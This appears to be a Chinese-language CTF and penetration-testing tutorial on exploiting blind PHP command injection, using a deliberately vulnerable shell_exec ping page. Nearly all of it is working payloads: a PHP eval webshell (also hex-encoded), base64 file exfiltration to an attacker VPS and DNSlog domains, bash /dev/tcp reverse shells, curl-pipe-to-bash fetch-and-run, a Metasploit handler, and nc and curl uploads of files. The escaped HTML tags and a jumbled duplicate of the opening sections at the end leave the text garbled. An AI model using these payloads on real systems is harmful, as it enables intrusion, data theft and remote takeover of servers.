PHP无回显命令执行的利用技术详解<\/h1>

一、前言<\/h2>
在CTF比赛和渗透测试中，经常会遇到命令执行但没有回显的情况。本文全面总结了无回显命令执行的判断方法和利用技术，帮助安全研究人员有效利用这类漏洞。<\/p>

二、判断方法<\/h2>

1. 代码审计<\/h3>
通过审计代码逻辑判断是否存在命令执行漏洞，这需要扎实的代码审计能力。<\/p>

2. 延时测试<\/h3>

ip=<\/span>| sleep 5<\/span>
<\/span><\/span><\/code><\/pre>如果执行后延时5秒，证明存在命令执行漏洞。<\/p>
3. HTTP请求测试<\/h3>
注意<\/strong>：ping命令不会产生HTTP请求<\/p>
步骤：<\/p>

公网服务器监听端口：<\/li>
<\/ol>
nc -lp 4444<\/span>
<\/span><\/span><\/code><\/pre>
目标服务器执行：<\/li>
<\/ol>
ip=<\/span>| curl 公网IP:4444
<\/span><\/span><\/code><\/pre>如果公网服务器收到请求，则存在漏洞。<\/p>
4. DNS请求测试(DNSLOG)<\/h3>

注册ceye.io获取域名(如v4utm7.ceye.io)<\/li>
执行命令：<\/li>
<\/ol>
ip=<\/span>| curl `<\/span>whoami`<\/span>.v4utm7.ceye.io
<\/span><\/span><\/code><\/pre>
查看dnslog记录，如显示www-data则存在漏洞。<\/li>
<\/ol>
三、利用方法<\/h2>
测试环境代码<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>header<\/span>("Content-type: text\/html; charset=utf-8"<\/span>);
<\/span><\/span>highlight_file<\/span>(__FILE__<\/span>);
<\/span><\/span>include<\/span>("flag.php"<\/span>);
<\/span><\/span>$ip =<\/span> $_REQUEST['ip'<\/span>];
<\/span><\/span>if<\/span>($ip){
<\/span><\/span>    shell_exec<\/span>("ping -c 4 "<\/span>.<\/span>$ip);
<\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>1. 直接执行命令写入文件<\/h3>
条件<\/strong>：站点目录有写权限<\/p>
方法：<\/p>
# 写入文本文件<\/span>
<\/span><\/span>cat flag.php > flag.txt
<\/span><\/span>cat flag.php >> flag.txt
<\/span><\/span>
<\/span><\/span># 使用复制命令<\/span>
<\/span><\/span>cp flag.php flag.txt
<\/span><\/span>
<\/span><\/span># 使用移动命令<\/span>
<\/span><\/span>mv flag.php flag.txt
<\/span><\/span>
<\/span><\/span># 打包压缩<\/span>
<\/span><\/span>tar cvf flag.tar flag.php
<\/span><\/span>tar zcvf flag.tar.gz flag.php
<\/span><\/span>zip flag.zip flag.php
<\/span><\/span><\/code><\/pre>解压后获取文件内容。<\/p>
2. 写入Webshell<\/h3>
条件<\/strong>：站点目录有写权限<\/p>
方法：<\/p>
# 直接写入<\/span>
<\/span><\/span>echo 3c3f706870206576616c28245f504f53545b3132335d293b203f3e | xxd -r -ps > webshell.php
<\/span><\/span>echo "<?php @eval(\$_POST[123]); ?>"<\/span> > webshell.php
<\/span><\/span>
<\/span><\/span># 外部下载<\/span>
<\/span><\/span>wget 网址 -O webshell.php
<\/span><\/span><\/code><\/pre>使用蚁剑等工具连接webshell获取flag。<\/p>
3. VPS记录脚本<\/h3>
条件<\/strong>：目标服务器可发起HTTP请求<\/p>
步骤：<\/p>

公网服务器创建record.php：<\/li>
<\/ol>
<?<\/span>php<\/span>
<\/span><\/span>$data =<\/span> $_GET['data'<\/span>];
<\/span><\/span>$f =<\/span> fopen<\/span>("flag.txt"<\/span>, "w"<\/span>);
<\/span><\/span>fwrite<\/span>($f, $data);
<\/span><\/span>fclose<\/span>($f);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>
目标服务器执行：<\/li>
<\/ol>
curl http:\/\/公网IP\/record.php?data=<\/span>`<\/span>cat flag.php | base64`<\/span>
<\/span><\/span>wget http:\/\/公网IP\/record.php?data=<\/span>`<\/span>cat flag.php | base64`<\/span>
<\/span><\/span><\/code><\/pre>
获取base64编码内容并解码。<\/li>
<\/ol>
4. DNSLOG带出数据<\/h3>
注意<\/strong>：<\/p>

避免空格，可用<代替<\/li>
反引号包含命令<\/li>
域名长度限制<\/li>
<\/ul>
方法：<\/p>
curl `<\/span>cat<flag.php|base64`<\/span>.v4utm7.ceye.io
<\/span><\/span>
<\/span><\/span># 或<\/span>
<\/span><\/span>`<\/span>cat flag.php|sed s\/[[<\/span>:space:]]<\/span>\/\/g`<\/span>.v4utm7.ceye.io
<\/span><\/span><\/code><\/pre>查看dnslog获取base64数据并解码。<\/p>
5. 反弹Shell<\/h3>
条件<\/strong>：目标服务器可连接公网<\/p>
方法1：<\/p>

公网服务器：<\/li>
<\/ol>
nc -vv -lp 8888<\/span>
<\/span><\/span><\/code><\/pre>
目标服务器：<\/li>
<\/ol>
bash -i >& \/dev\/tcp\/公网IP\/8888 0>&1<\/span>
<\/span><\/span><\/code><\/pre>
Payload：<\/li>
<\/ol>
ip=127.0.0.1%0d%0abash+-i+>%26+\/dev\/tcp\/公网IP\/8888+0>%261
<\/code><\/pre>
方法2：<\/p>

公网服务器：<\/li>
<\/ol>
nc -lvp 4444<\/span>
<\/span><\/span><\/code><\/pre>
创建qwzf文件内容：<\/li>
<\/ol>
bash -i >& \/dev\/tcp\/公网IP\/4444 0>&1<\/span>
<\/span><\/span><\/code><\/pre>
目标服务器：<\/li>
<\/ol>
ip=<\/span>| curl 公网IP:8002\/qwzf | bash
<\/span><\/span><\/code><\/pre>6. MSF反向连接<\/h3>
条件<\/strong>：目标服务器可连接公网<\/p>
步骤：<\/p>

公网服务器MSF配置：<\/li>
<\/ol>
use exploit\/multi\/handler
<\/span><\/span>set payload linux\/armle\/shell\/reverse_tcp
<\/span><\/span>set lport 4444<\/span>
<\/span><\/span>set lhost 公网IP
<\/span><\/span>set exitonsession false
<\/span><\/span>exploit -j
<\/span><\/span><\/code><\/pre>
目标服务器执行：<\/li>
<\/ol>
ip=<\/span>| bash -i >& \/dev\/tcp\/公网IP\/4444 0>&1<\/span>
<\/span><\/span><\/code><\/pre>或<\/p>
ip=<\/span>| curl 公网IP:8002\/qwzf | bash
<\/span><\/span><\/code><\/pre>
获取shell后查看flag。<\/li>
<\/ol>
7. 使用NC传输文件<\/h3>
条件<\/strong>：目标服务器有nc工具<\/p>
TCP方法：<\/p>

公网服务器：<\/li>
<\/ol>
nc -tlp 4444<\/span>
<\/span><\/span><\/code><\/pre>
目标服务器：<\/li>
<\/ol>
ip=<\/span>| nc -t 公网IP 4444<\/span> < flag.php
<\/span><\/span><\/code><\/pre>UDP方法：<\/p>

公网服务器：<\/li>
<\/ol>
nc -ulp 4444<\/span>
<\/span><\/span><\/code><\/pre>
目标服务器：<\/li>
<\/ol>
ip=<\/span>| nc -u 公网IP 4444<\/span> < flag.php
<\/span><\/span><\/code><\/pre>8. Curl上传文件<\/h3>
条件<\/strong>：curl命令可用<\/p>
步骤：<\/p>

获取Burp Collaborator地址(如jyla6p5cfepdojez34stnodch3ntbi.burpcollaborator.net)<\/li>
执行：<\/li>
<\/ol>
ip=<\/span>| curl -X POST -F xx=<\/span>@flag.php http:\/\/Collaborator地址
<\/span><\/span><\/code><\/pre>
查看Collaborator收到的数据获取flag。<\/li>
<\/ol>
四、总结<\/h2>
本文详细介绍了多种无回显命令执行的利用技术，包括：<\/p>

直接写入文件<\/li>
Webshell写入<\/li>
VPS记录脚本<\/li>
DNSLOG外带数据<\/li>
反弹Shell<\/li>
MSF反向连接<\/li>
NC文件传输<\/li>
Curl上传文件<\/li>
<\/ul>
根据目标环境的不同限制条件，选择最适合的利用方法。在实际测试中，可能需要结合多种技术才能成功获取数据。<\/p>

PHP无回显命令执行的利用技术详解<\/h1>

一、前言<\/h2> 在CTF比赛和渗透测试中，经常会遇到命令执行但没有回显的情况。本文全面总结了无回显命令执行的判断方法和利用技术，帮助安全研究人员有效利用这类漏洞。<\/p>

二、判断方法<\/h2>

1. 代码审计<\/h3> 通过审计代码逻辑判断是否存在命令执行漏洞，这需要扎实的代码审计能力。<\/p>

三、利用方法<\/h2>

一、前言<\/h2>
在CTF比赛和渗透测试中，经常会遇到命令执行但没有回显的情况。本文全面总结了无回显命令执行的判断方法和利用技术，帮助安全研究人员有效利用这类漏洞。<\/p>

1. 代码审计<\/h3>
通过审计代码逻辑判断是否存在命令执行漏洞，这需要扎实的代码审计能力。<\/p>